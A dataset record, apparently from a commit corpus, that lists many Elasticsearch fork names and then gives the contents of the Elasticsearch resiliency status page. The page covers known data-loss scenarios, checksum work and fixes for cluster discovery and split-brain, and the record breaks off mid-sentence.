a-test,huanzhong\/elasticsearch,janmejay\/elasticsearch,clintongormley\/elasticsearch,palecur\/elasticsearch,aglne\/elasticsearch,tahaemin\/elasticsearch,girirajsharma\/elasticsearch,javachengwc\/elasticsearch,weipinghe\/elasticsearch,likaiwalkman\/elasticsearch,Ansh90\/elasticsearch,caengcjd\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,glefloch\/elasticsearch,sarwarbhuiyan\/elasticsearch,mjhennig\/elasticsearch,sc0ttkclark\/elasticsearch,strapdata\/elassandra-test,ZTE-PaaS\/elasticsearch,franklanganke\/elasticsearch,gfyoung\/elasticsearch,wuranbo\/elasticsearch,amaliujia\/elasticsearch,amit-shar\/elasticsearch,YosuaMichael\/elasticsearch,overcome\/elasticsearch,queirozfcom\/elasticsearch,zkidkid\/elasticsearch,ThalaivaStars\/OrgRepo1,jbertouch\/elasticsearch,fernandozhu\/elasticsearch,smflorentino\/elasticsearch,chrismwendt\/elasticsearch,kimimj\/elasticsearch,jw0201\/elastic,kevinkluge\/elasticsearch,amit-shar\/elasticsearch,coding0011\/elasticsearch,drewr\/elasticsearch,Collaborne\/elasticsearch,liweinan0423\/elasticsearch,NBSW\/elasticsearch,ThalaivaStars\/OrgRepo1,petmit\/elasticsearch,jprante\/elasticsearch,cwurm\/elasticsearch,luiseduardohdbackup\/elasticsearch,Siddartha07\/elasticsearch,heng4fun\/elasticsearch,lchennup\/elasticsearch,nezirus\/elasticsearch,himanshuag\/elasticsearch,spiegela\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,diendt\/elasticsearch,aglne\/elasticsearch,mrorii\/elasticsearch,camilojd\/elasticsearch,Kakakakakku\/elasticsearch,sarwarbhuiyan\/elasticsearch,AshishThakur\/elasticsearch,Stacey-Gammon\/elasticsearch,episerver\/elasticsearch,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,areek\/elasticsearch,kunallimaye\/elasticsearch,Ansh90\/elasticsearch,humandb\/elasticsearch,vrkansagara\/elasticsearch,rhoml\/elasticsearch,Microsoft\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,Microsoft\/elasticsearch,tcucchietti\/elasticsearch,ThalaivaStars\/OrgRepo1,truemped\/elasticsearch,pozhidaevak\/elasticsearch,mute\/elasticsearch,sjohnr\/elasticsearch,nellicus\/elasticsearch,dylan8902\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,humandb\/elasticsearch,phani546\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,sdauletau\/elasticsearch,vrkansagara\/elasticsearch,HonzaKral\/elasticsearch,dylan8902\/elasticsearch,kkirsche\/elasticsearch,yynil\/elasticsearch,jw0201\/elastic,obourgain\/elasticsearch,markharwood\/elasticsearch,Brijeshrpatel9\/elasticsearch,JSCooke\/elasticsearch,kkirsche\/elasticsearch,MisterAndersen\/elasticsearch,hanst\/elasticsearch,overcome\/elasticsearch,brandonkearby\/elasticsearch,hafkensite\/elasticsearch,Brijeshrpatel9\/elasticsearch,masterweb121\/elasticsearch,mbrukman\/elasticsearch,xuzha\/elasticsearch,knight1128\/elasticsearch,mrorii\/elasticsearch,combinatorist\/elasticsearch,kcompher\/elasticsearch,slavau\/elasticsearch,martinstuga\/elasticsearch,Clairebi\/ElasticsearchClone,andrestc\/elasticsearch,scottsom\/elasticsearch,zeroctu\/elasticsearch,ThalaivaStars\/OrgRepo1,elasticdog\/elasticsearch,hechunwen\/elasticsearch,socialrank\/elasticsearch,weipinghe\/elasticsearch,mm0\/elasticsearch,spiegela\/elasticsearch,heng4fun\/elasticsearch,djschny\/elasticsearch,weipinghe\/elasticsearch,socialrank\/elasticsearch,lzo\/elasticsearch-1,diendt\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,palecur\/elasticsearch,rlugojr\/elasticsearch,snikch\/elasticsearch,jpountz\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,Microsoft\/elasticsearch,PhaedrusTheGreek\/elasticsearch,drewr\/elasticsearch,jango2015\/elasticsearch,wimvds\/elasticsearch,Stacey-Gammon\/elasticsearch,mrorii\/elasticsearch,Siddartha07\/elasticsearch,KimTaehee\/elasticsearch,fforbeck\/elasticsearch,a2lin\/elasticsearch,Liziyao\/elasticsearch,iamjakob\/elasticsearch,mbrukman\/elasticsearch,szroland\/elasticsearch,Rygbee\/elasticsearch,sscarduzio\/elasticsearch,MichaelLiZhou\/elasticsearch,pritishppai\/elasticsearch,Siddartha07\/elasticsearch,weipinghe\/elasticsearch,tsohil\/elasticsearch,strapdata\/elassandra,ImpressTV\/elasticsearch,loconsolutions\/elasticsearch,humandb\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mortonsykes\/elasticsearch,C-Bish\/elasticsearch,Brijeshrpatel9\/elasticsearch,markllama\/elasticsearch,MaineC\/elasticsearch,mapr\/elasticsearch,markharwood\/elasticsearch,snikch\/elasticsearch,mbrukman\/elasticsearch,IanvsPoplicola\/elasticsearch,gmarz\/elasticsearch,tsohil\/elasticsearch,rajanm\/elasticsearch,schonfeld\/elasticsearch,jaynblue\/elasticsearch,ulkas\/elasticsearch,kunallimaye\/elasticsearch,amaliujia\/elasticsearch,Microsoft\/elasticsearch,elancom\/elasticsearch,jimhooker2002\/elasticsearch,MetSystem\/elasticsearch,SergVro\/elasticsearch,robin13\/elasticsearch,sposam\/elasticsearch,LeoYao\/elasticsearch,adrianbk\/elasticsearch,golubev\/elasticsearch,rento19962\/elasticsearch,yynil\/elasticsearch,JervyShi\/elasticsearch,mmaracic\/elasticsearch,pranavraman\/elasticsearch,kevinkluge\/elasticsearch,Shekharrajak\/elasticsearch,feiqitian\/elasticsearch,kaneshin\/elasticsearch,petabytedata\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,Liziyao\/elasticsearch,mute\/elasticsearch,lmtwga\/elasticsearch,elasticdog\/elasticsearch,18098924759\/elasticsearch,Charlesdong\/elasticsearch,hirdesh2008\/elasticsearch,s1monw\/elasticsearch,hanst\/elasticsearch,xingguang2013\/elasticsearch,winstonewert\/elasticsearch,ESamir\/elasticsearch,AleksKochev\/elasticsearch,kubum\/elasticsearch,acchen97\/elasticsearch,clintongormley\/elasticsearch,JackyMai\/elasticsearch,nellicus\/elasticsearch,cwurm\/elasticsearch,clintongormley\/elasticsearch,koxa29\/elasticsearch,javachengwc\/elasticsearch,hanst\/elasticsearch,Widen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,bestwpw\/elasticsearch,zeroctu\/elasticsearch,opendatasoft\/elasticsearch,wittyameta\/elasticsearch,drewr\/elasticsearch,hanswang\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,petabytedata\/elasticsearch,wimvds\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,KimTaehee\/elasticsearch,Uiho\/elasticsearch,markwalkom\/elasticsearch,zhiqinghuang\/elasticsearch,jango2015\/elasticsearch,btiernay\/elasticsearch,schonfeld\/elasticsearch,kalburgimanjunath\/elasticsearch,overcome\/elasticsearch,masterweb121\/elasticsearch,fooljohnny\/elasticsearch,EasonYi\/elasticsearch,kenshin233\/elasticsearch,ZTE-PaaS\/elasticsearch,tcucchietti\/elasticsearch,jimhooker2002\/elasticsearch,btiernay\/elasticsearch,franklanganke\/elasticsearch,bestwpw\/elasticsearch,sreeramjayan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,HarishAtGitHub\/elasticsearch,feiqitian\/elasticsearch,fred84\/elasticsearch,JervyShi\/elasticsearch,strapdata\/elassandra,polyfractal\/elasticsearch,AleksKochev\/elasticsearch,gingerwizard\/elasticsearch,golubev\/elasticsearch,Widen\/elasticsearch,slavau\/elasticsearch,kalburgimanjunath\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,fernandozhu\/elasticsearch,zhiqinghuang\/elasticsearch,KimTaehee\/elasticsearch,winstonewert\/elasticsearch,sc0ttkclark\/elasticsearch,ImpressTV\/elasticsearch,zkidkid\/elasticsearch,feiqitian\/elasticsearch,lydonchandra\/elasticsearch,wayeast\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,yynil\/elasticsearch,kcompher\/elasticsearch,wangtuo\/elasticsearch,sposam\/elasticsearch,Rygbee\/elasticsearch,combinatorist\/elasticsearch,diendt\/elasticsearch,beiske\/elasticsearch,vingupta3\/elasticsearch,HarishAtGitHub\/elasticsearch,Clairebi\/ElasticsearchClone,strapdata\/elassandra,vrkansagara\/elasticsearch,polyfractal\/elasticsearch,likaiwalkman\/elasticsearch,mgalushka\/elasticsearch,wbowling\/elasticsearch,springning\/elasticsearch,Uiho\/elasticsearch,sjohnr\/elasticsearch,Collaborne\/elasticsearch,kenshin233\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,Uiho\/elasticsearch,wuranbo\/elasticsearch,drewr\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,Clairebi\/ElasticsearchClone,VukDukic\/elasticsearch,areek\/elasticsearch,sdauletau\/elasticsearch,truemped\/elasticsearch,karthikjaps\/elasticsearch,strapdata\/elassandra5-rc,jbertouch\/elasticsearch,gingerwizard\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,uschindler\/elasticsearch,infusionsoft\/elasticsearch,apepper\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,milodky\/elasticsearch,yongminxia\/elasticsearch,jw0201\/elastic,camilojd\/elasticsearch,ImpressTV\/elasticsearch,mjhennig\/elasticsearch,fred84\/elasticsearch,easonC\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mm0\/elasticsearch,MjAbuz\/elasticsearch,kunallimaye\/elasticsearch,a2lin\/elasticsearch,fooljohnny\/elasticsearch,coding0011\/elasticsearch,ouyangkongtong\/elasticsearch,apepper\/elasticsearch,andrejserafim\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,jprante\/elasticsearch,vvcephei\/elasticsearch,Shekharrajak\/elasticsearch,artnowo\/elasticsearch,Widen\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,wbowling\/elasticsearch,vingupta3\/elasticsearch,F0lha\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,smflorentino\/elasticsearch,SergVro\/elasticsearch,yanjunh\/elasticsearch,fred84\/elasticsearch,yanjunh\/elasticsearch,mortonsykes\/elasticsearch,alexbrasetvik\/elasticsearch,HarishAtGitHub\/elasticsearch,yuy168\/elasticsearch,Liziyao\/elasticsearch,naveenhooda2000\/elasticsearch,nellicus\/elasticsearch,likaiwalkman\/elasticsearch,martinstuga\/elasticsearch,bawse\/elasticsearch,Fsero\/elasticsearch,gmarz\/elasticsearch,beiske\/elasticsearch,springning\/elasticsearch,YosuaMichael\/elasticsearch,codebunt\/elasticsearch,wbowling\/elasticsearch,a2lin\/elasticsearch,xuzha\/elasticsearch,cnfire\/elasticsearch-1,spiegela\/elasticsearch,hechunwen\/elasticsearch,hanswang\/elasticsearch,jimczi\/elasticsearch,iamjakob\/elasticsearch,luiseduardohdbackup\/elasticsearch,djschny\/elasticsearch,ckclark\/elasticsearch,iamjakob\/elasticsearch,codebunt\/elasticsearch,yongminxia\/elasticsearch,beiske\/elasticsearch,himanshuag\/elasticsearch,luiseduardohdbackup\/elasticsearch,kubum\/elasticsearch,Shepard1212\/elasticsearch,AshishThakur\/elasticsearch,achow\/elasticsearch,scorpionvicky\/elasticsearch,javachengwc\/elasticsearch,luiseduardohdbackup\/elasticsearch,girirajsharma\/elasticsearch,fforbeck\/elasticsearch,linglaiyao1314\/elasticsearch,adrianbk\/elasticsearch,kkirsche\/elasticsearch,javachengwc\/elasticsearch,JervyShi\/elasticsearch,jw0201\/elastic,gfyoung\/elasticsearch,sdauletau\/elasticsearch,NBSW\/elasticsearch,NBSW\/elasticsearch,mohit\/elasticsearch,gmarz\/elasticsearch,sneivandt\/elasticsearch,nrkkalyan\/elasticsearch,overcome\/elasticsearch,zeroctu\/elasticsearch,aglne\/elasticsearch,gfyoung\/elasticsearch,kkirsche\/elasticsearch,rajanm\/elasticsearch,jaynblue\/elasticsearch,btiernay\/elasticsearch,karthikjaps\/elasticsearch,jchampion\/elasticsearch,zeroctu\/elasticsearch,TonyChai24\/ESSource,adrianbk\/elasticsearch,Chhunlong\/elasticsearch,cwurm\/elasticsearch,slavau\/elasticsearch,janmejay\/elasticsearch,sauravmondallive\/elasticsearch,achow\/elasticsearch,wenpos\/elasticsearch,achow\/elasticsearch,JervyShi\/elasticsearch,andrestc\/elasticsearch,khiraiwa\/elasticsearch,kalburgimanjunath\/elasticsearch,easonC\/elasticsearch,MjAbuz\/elasticsearch,avikurapati\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,amaliujia\/elasticsearch,ckclark\/elasticsearch,rlugojr\/elasticsearch,chirilo\/elasticsearch,awislowski\/elasticsearch,IanvsPoplicola\/elasticsearch,dataduke\/elasticsearch,MichaelLiZhou\/elasticsearch,slavau\/elasticsearch,iantruslove\/elasticsearch,Flipkart\/elasticsearch,thecocce\/elasticsearch,sreeramjayan\/elasticsearch,mjhennig\/elasticsearch,jprante\/elasticsearch,amit-shar\/elasticsearch,huanzhong\/elasticsearch,lchennup\/elasticsearch,wenpos\/elasticsearch,hafkensite\/elasticsearch,shreejay\/elasticsearch,humandb\/elasticsearch,schonfeld\/elasticsearch,Siddartha07\/elasticsearch,knight1128\/elasticsearch,feiqitian\/elasticsearch,masaruh\/elasticsearch,onegambler\/elasticsearch,mcku\/elasticsearch,glefloch\/elasticsearch,wangyuxue\/elasticsearch,tcucchietti\/elasticsearch,LewayneNaidoo\/elasticsearch,micpalmia\/elasticsearch,VukDukic\/elasticsearch,socialrank\/elasticsearch,easonC\/elasticsearch,khiraiwa\/elasticsearch,dantuffery\/elasticsearch,ImpressTV\/elasticsearch,davidvgalbraith\/elasticsearch,thecocce\/elasticsearch,YosuaMichael\/elasticsearch,LewayneNaidoo\/elasticsearch,xingguang2013\/elasticsearch,scorpionvicky\/elasticsearch,tsohil\/elasticsearch,weipinghe\/elasticsearch,kevinkluge\/elasticsearch,btiernay\/elasticsearch,strapdata\/elassandra5-rc,abibell\/elasticsearch,rmuir\/elasticsearch,rhoml\/elasticsearch,HarishAtGitHub\/elasticsearch,Asimov4\/elasticsearch,henakamaMSFT\/elasticsearch,vietlq\/elasticsearch,kevinkluge\/elasticsearch,18098924759\/elasticsearch,mikemccand\/elasticsearch,andrejserafim\/elasticsearch,pablocastro\/elasticsearch,mjhennig\/elasticsearch,abibell\/elasticsearch,Rygbee\/elasticsearch,codebunt\/elasticsearch,liweinan0423\/elasticsearch,Stacey-Gammon\/elasticsearch,jchampion\/elasticsearch,snikch\/elasticsearch,kunallimaye\/elasticsearch,sreeramjayan\/elasticsearch,jimhooker2002\/elasticsearch,Shekharrajak\/elasticsearch,easonC\/elasticsearch,yuy168\/elasticsearch,vroyer\/elasticassandra,sc0ttkclark\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,pritishppai\/elasticsearch,MaineC\/elasticsearch,truemped\/elasticsearch,rmuir\/elasticsearch,JackyMai\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,zhiqinghuang\/elasticsearch,palecur\/elasticsearch,strapdata\/elassandra5-rc,jimhooker2002\/elasticsearch,yynil\/elasticsearch,lmtwga\/elasticsearch,masterweb121\/elasticsearch,pozhidaevak\/elasticsearch,onegambler\/elasticsearch,MichaelLiZhou\/elasticsearch,JackyMai\/elasticsearch,xuzha\/elasticsearch,chirilo\/elasticsearch,markllama\/elasticsearch,vrkansagara\/elasticsearch,xingguang2013\/elasticsearch,naveenhooda2000\/elasticsearch,likaiwalkman\/elasticsearch,AshishThakur\/elasticsearch,nomoa\/elasticsearch,hirdesh2008\/elasticsearch,milodky\/elasticsearch,Clairebi\/ElasticsearchClone,wayeast\/elasticsearch,s1monw\/elasticsearch,davidvgalbraith\/elasticsearch,AleksKochev\/elasticsearch,skearns64\/elasticsearch,clintongormley\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jsgao0\/elasticsearch,tahaemin\/elasticsearch,mcku\/elasticsearch,hafkensite\/elasticsearch,pranavraman\/elasticsearch,kenshin233\/elasticsearch,slavau\/elasticsearch,MetSystem\/elasticsearch,lchennup\/elasticsearch,jango2015\/elasticsearch,ckclark\/elasticsearch,yuy168\/elasticsearch,vietlq\/elasticsearch,smflorentino\/elasticsearch,i-am-Nathan\/elasticsearch,humandb\/elasticsearch,jchampion\/elasticsearch,Shepard1212\/elasticsearch,kenshin233\/elasticsearch,sjohnr\/elasticsearch,winstonewert\/elasticsearch,artnowo\/elasticsearch,Chhunlong\/elasticsearch,strapdata\/elassandra5-rc,smflorentino\/elasticsearch,mbrukman\/elasticsearch,smflorentino\/elasticsearch,vietlq\/elasticsearch,vingupta3\/elasticsearch,kalburgimanjunath\/elasticsearch,MetSystem\/elasticsearch,ydsakyclguozi\/elasticsearch,ivansun1010\/elasticsearch,Chhunlong\/elasticsearch,opendatasoft\/elasticsearch,khiraiwa\/elasticsearch,sneivandt\/elasticsearch,ulkas\/elasticsearch,huypx1292\/elasticsearch,javachengwc\/elasticsearch,dongjoon-hyun\/elasticsearch,rlugojr\/elasticsearch,TonyChai24\/ESSource,mjason3\/elasticsearch,sscarduzio\/elasticsearch,ESamir\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,palecur\/elasticsearch,markharwood\/elasticsearch,kingaj\/elasticsearch,mohit\/elasticsearch,hafkensite\/elasticsearch,tkssharma\/elasticsearch,lzo\/elasticsearch-1,micpalmia\/elasticsearch,linglaiyao1314\/elasticsearch,petmit\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mmaracic\/elasticsearch,thecocce\/elasticsearch,truemped\/elasticsearch,bestwpw\/elasticsearch,vroyer\/elasticassandra,kevinkluge\/elasticsearch,micpalmia\/elasticsearch,adrianbk\/elasticsearch,Charlesdong\/elasticsearch,codebunt\/elasticsearch,mute\/elasticsearch,snikch\/elasticsearch,lmtwga\/elasticsearch,Fsero\/elasticsearch,henakamaMSFT\/elasticsearch,wimvds\/elasticsearch,mnylen\/elasticsearch,ThalaivaStars\/OrgRepo1,kalburgimanjunath\/elasticsearch,spiegela\/elasticsearch,hydro2k\/elasticsearch,jw0201\/elastic,LeoYao\/elasticsearch,hirdesh2008\/elasticsearch,awislowski\/elasticsearch,anti-social\/elasticsearch,jeteve\/elasticsearch,Charlesdong\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,markharwood\/elasticsearch,mnylen\/elasticsearch,socialrank\/elasticsearch,wbowling\/elasticsearch,janmejay\/elasticsearch,MjAbuz\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,gmarz\/elasticsearch,alexbrasetvik\/elasticsearch,beiske\/elasticsearch,alexbrasetvik\/elasticsearch,camilojd\/elasticsearch,wangtuo\/elasticsearch,dpursehouse\/elasticsearch,lydonchandra\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,kimimj\/elasticsearch,JackyMai\/elasticsearch,F0lha\/elasticsearch,rmuir\/elasticsearch,iantruslove\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,jango2015\/elasticsearch,cnfire\/elasticsearch-1,kunallimaye\/elasticsearch,myelin\/elasticsearch,liweinan0423\/elasticsearch,opendatasoft\/elasticsearch,iacdingping\/elasticsearch,girirajsharma\/elasticsearch,myelin\/elasticsearch,koxa29\/elasticsearch,LeoYao\/elasticsearch,kunallimaye\/elasticsearch,janmejay\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,phani546\/elasticsearch,yuy168\/elasticsearch,adrianbk\/elasticsearch,mm0\/elasticsearch,MjAbuz\/elasticsearch,kalburgimanjunath\/elasticsearch,jaynblue\/elasticsearch,Fsero\/elasticsearch,wittyameta\/elasticsearch,heng4fun\/elasticsearch,gingerwizard\/elasticsearch,iacdingping\/elasticsearch,vroyer\/elassandra,mute\/elasticsearch,skearns64\/elasticsearch,jimhooker2002\/elasticsearch,dataduke\/elasticsearch,djschny\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,schonfeld\/elasticsearch,mgalushka\/elasticsearch,ckclark\/elasticsearch,himanshuag\/elasticsearch,shreejay\/elasticsearch","old_file":"docs\/resiliency\/index.asciidoc","new_file":"docs\/resiliency\/index.asciidoc","new_contents":"= Resiliency Status\n\n:JIRA: https:\/\/issues.apache.org\/jira\/browse\/LUCENE-\n:GIT: https:\/\/github.com\/elasticsearch\/elasticsearch\/issues\/\n\n== Overview\n\nThe team at Elasticsearch is committed to continuously improving both\nElasticsearch and Apache Lucene to protect your data. As with any distributed\nsystem, Elasticsearch is complex and has many moving parts, each of which can\nencounter edge cases that require proper handling. Our resiliency project is\nan ongoing effort to find and fix these edge cases. If you want to keep up\nwith all this project on GitHub, see our issues list under the tag\nhttps:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Aresiliency[resiliency].\n\nWhile GitHub is great for sharing our work, it can be difficult to get an\noverview of the current state of affairs and the previous work that has been\ndone from an issues list. This page provides an overview of all the\nresiliency-related issues that we are aware of, improvements that have already\nbeen made and current in-progress work. We\u2019ve also listed some historical\nimprovements throughout this page to provide the full context.\n\nIf you\u2019re interested in more on how we approach ensuring resiliency in\nElasticsearch, you may be interested in Igor Motov\u2019s recent talk\nhttp:\/\/www.elasticsearch.org\/videos\/improving-elasticsearch-resiliency\/[Improving Elasticsearch Resiliency].\n\nYou may also be interested in our blog post\nhttp:\/\/www.elasticsearch.org\/blog\/resiliency-elasticsearch\/[Resiliency in Elasticsearch],\nwhich details our thought processes when addressing resiliency in both\nElasticsearch and the work our developers do upstream in Apache Lucene.\n\n== Data Store Recommendations\n\nSome customers use Elasticsearch as a primary datastore, some set-up\ncomprehensive back-up solutions using features such as our Snapshot and\nRestore, while others use Elasticsearch in conjunction with a data storage\nsystem like Hadoop or even flat files. Elasticsearch can be used for so many\ndifferent use cases which is why we have created this page to make sure you\nare fully informed when you are architecting your system.\n\n== Work in Progress\n\n[float]\n=== Known Unknowns (STATUS: ONGOING)\n\nWe consider this topic to be the most important in our quest for\nresiliency. We put a tremendous amount of effort into testing\nElasticsearch to simulate failures and randomize configuration to\nproduce extreme conditions. In addition, our users are an important\nsource of information on unexpected edge cases and your bug reports\nhelp us make fixes that ensure that our system continues to be\nresilient.\n\nIf you encounter an issue, https:\/\/github.com\/elasticsearch\/elasticsearch\/issues[please report it]!\n\nWe are committed to tracking down and fixing all the issues that are posted.\n\n[float]\n=== Loss of documents during network partition (STATUS: ONGOING)\n\nIf a network partition separates a node from the master, there is some window of time before the node detects it. The length of the window is dependent on the type of the partition. This window is extremely small if a socket is broken. More adversarial partitions, for example, silently dropping requests without breaking the socket can take longer (up to 3x30s using current defaults).\n\nIf the node hosts a primary shard at the moment of partition, and ends up being isolated from the cluster (which could have resulted in {GIT}2488[split-brain] before), some documents that are being indexed into the primary may be lost if they fail to reach one of the allocated replicas (due to the partition) and that replica is later promoted to primary by the master. {GIT}7572[#7572]\n\nA test to replicate this condition was added in {GIT}7493[#7493].\n\n[float]\n=== Prevent use of known-bad Java versions (STATUS: ONGOING)\n\nCertain versions of the JVM are known to have bugs which can cause index corruption. {GIT}7580[#7580] prevents Elasticsearch startup if known bad versions are in use.\n\n[float]\n=== Lucene checksums phase 2 (STATUS:ONGOING)\n\nWhen Lucene opens a segment for reading, it validates the checksum on the smaller segment files -- those which it reads entirely into memory -- but not the large files like term frequencies and positions, as this would be very expensive. During merges, term vectors and stored fields are validated, as long the segments being merged come from the same version of Lucene. Checksumming for term vectors and stored fields is important because merging consists of performing optimized byte copies. Term frequencies, term positions, payloads, doc values, and norms are currently not checked during merges, although Lucene provides the option to do so. These files are less prone to silent corruption as they are actively decoded during merge, and so are more likely to throw exceptions if there is any corruption.\n\nThere are a few ongoing efforts to improve coverage:\n\n* {GIT}7360[#7360] validates checksums on all segment files during merges. (STATUS: DONE, fixed in 1.4.0.Beta1)\n* {JIRA}5842[LUCENE-5842] validates the structure of the checksum footer of the postings lists, doc values, stored fields and term vectors when opening a new segment, to ensure that these files have not been truncated. (STATUS: DONE, Fixed in Lucene 4.10 and 1.4.0.Beta1)\n* {JIRA}5894[LUCENE-5894] lays the groundwork for extending more efficient checksum validation to all files during optimized bulk merges, if possible. (STATUS: ONGOING, Fixed in Lucene 5.0)\n* {GIT}7586[#7586] adds checksums for cluster and index state files. (STATUS: ONGOING, fixed in 1.5.0)\n\n[float]\n=== Add per-segment and per-commit ID to help replication (STATUS: ONGOING)\n\n{JIRA}5895[LUCENE-5895] adds a unique ID for each segment and each commit point. File-based replication (as performed by snapshot\/restore) can use this ID to know whether the segment\/commit on the source and destination machines are the same. Fixed in Lucene 5.0.\n\n[float]\n=== Improving Zen Discovery (STATUS: ONGOING)\n\nRecovery from failure is a complicated process, especially in an asynchronous distributed system like Elasticsearch. With several processes happening in parallel, it is important to ensure that recovery proceeds swiftly and safely. While fixing the {GIT}2488[split-brain issue] we have been hunting down corner cases that were not handled optimally, adding tests to demonstrate the issues, and working on fixes:\n\n* Faster & better detection of master & node failures, including not trying to reconnect upon disconnect, fail on disconnect error on ping, verify cluster names in pings. Previously, Elasticsearch had to wait a bit for the node to complete the process required to join the cluster. Recent changes guarantee that a node has fully joined the cluster before we start the fault detection process. Therefore we can do an immediate check causing faster detection of errors and validation of cluster state after a minimum master node breach. {GIT}6706[#6706], {GIT}7399[#7399] (STATUS: DONE, v1.4.0.Beta1)\n* Broaden Unicast pinging when master fails: When a node loses it\u2019s current master it will start pinging to find a new one. Previously, when using unicast based pinging, the node would ping a set of predefined nodes asking them whether the master had really disappeared or whether there was a network hiccup. Now, we ping all nodes in the cluster to increase coverage. In the case that all unicast hosts are disconnected from the current master during a network failure, this improvement is essential to allow the cluster to reform once the partition is healed. {GIT}7336[#7336] (STATUS: DONE, v1.4.0.Beta1)\n* After joining a cluster, validate that the join was successful and that the master has been set in the local cluster state. {GIT}6969[#6969]. (STATUS: DONE, v1.4.0.Beta1)\n* Write additional tests that use the test infrastructure to verify proper behavior during network disconnections and garbage collections. {GIT}7082[#7082] (STATUS: ONGOING)\n* Make write calls return the number of total\/successful\/missing shards in the same way that we do in search, which ensures transparency in the consistency of write operations. {GIT}7572[#7572]. (STATUS: ONGOING)\n\n[float]\n=== Validate quorum before accepting a write request (STATUS: ONGOING)\n\nToday, when a node holding a primary shard receives an index request, it checks the local cluster state to see whether a quorum of shards is available before it accepts the request. However, it can take some time before an unresponsive node is removed from the cluster state. We are adding an optional live check, where the primary node tries to contact its replicas to confirm that they are still responding before accepting any changes. See {GIT}6937[#6937].\n\nWhile the work is going on, we tightened the current checks by bringing them closer to the index code. See {GIT}7873[#7873] (STATUS: DONE, fixed in 1.4.0)\n\n[float]\n=== Jepsen Test Failures (STATUS: ONGOING)\n\nWe have increased our test coverage to include scenarios tested by Jepsen. We make heavy use of randomization to expand on the scenarios that can be tested and to introduce new error conditions. You can follow the work on the master branch of the https:\/\/github.com\/elasticsearch\/elasticsearch\/blob\/master\/src\/test\/java\/org\/elasticsearch\/discovery\/DiscoveryWithServiceDisruptions.java[`DiscoveryWithServiceDisruptions` class], where we will add more tests as time progresses.\n\n[float]\n=== Document guarantees and handling of failure (STATUS: ONGOING)\n\nThis status page is a start, but we can do a better job of explicitly documenting the processes at work in Elasticsearch, and what happens in the case of each type of failure. The plan is to have a test case that validates each behavior under simulated conditions. Every test will document the expected results, the associated test code and an explicit PASS or FAIL status for each simulated case.\n\n\n[float]\n=== Take filter cache key size into account (STATUS: ONGOING)\n\nCommonly used filters are cached in Elasticsearch. That cache is limited in size (10% of node's memory by default) and is being evicted based on a least recently used policy. The amount of memory used by the cache depends on two primary components - the values it stores and the keys associated with them. Calculating the memory footprint of the values is easy enough but the keys accounting is trickier to achieve as they are, by default, raw Lucene objects. This is largely not a problem as the keys are dominated by the values. However, recent optimizations in Lucene have changed the balance causing the filter cache to grow beyond it's size.\n\nWhile we are working on a longer term solution, we introduced a minimum weight of 1k for each cache entry. This puts an effective limit on the number of entries in the cache. See {GIT}8304[#8304] (STATUS: DONE, fixed in 1.4.0)\n\n== Completed\n\n[float]\n=== Don't allow unsupported codecs (STATUS: DONE, v1.4.0.Beta1)\n\nLucene 4 added a number of alternative codecs for experimentation purposes, and Elasticsearch exposed the ability to change codecs. Since then, Lucene has settled on the best choice of codec and provides backwards compatibility only for the default codec. {GIT}7566[#7566] removes the ability to set alternate codecs.\n\n[float]\n=== Use checksums to identify entire segments (STATUS: DONE, v1.4.0.Beta1)\n\nA hash collision makes it possible for two different files to have the same length and the same checksum. Instead, a segment's identity should rely on checksums from all of the files in a single segment, which greatly reduces the chance of a collision. This change has been merged ({GIT}7351[#7351]).\n\n[float]\n=== Fix ''Split Brain can occur even with minimum_master_nodes'' (STATUS: DONE, v1.4.0.Beta1)\n\nEven when minimum master nodes is set, split brain can still occur under certain conditions, e.g. disconnection between master eligible nodes, which can lead to data loss. The scenario is described in detail in {GIT}2488[issue 2488]:\n\n* Introduce a new testing infrastructure to simulate different types of node disconnections, including loss of network connection, lost messages, message delays, etc. See {GIT}5631[MockTransportService] support and {GIT}6505[service disruption] for more details. (STATUS: DONE, v1.4.0.Beta1).\n* Added tests that simulated the bug described in issue 2488. You can take a look at the 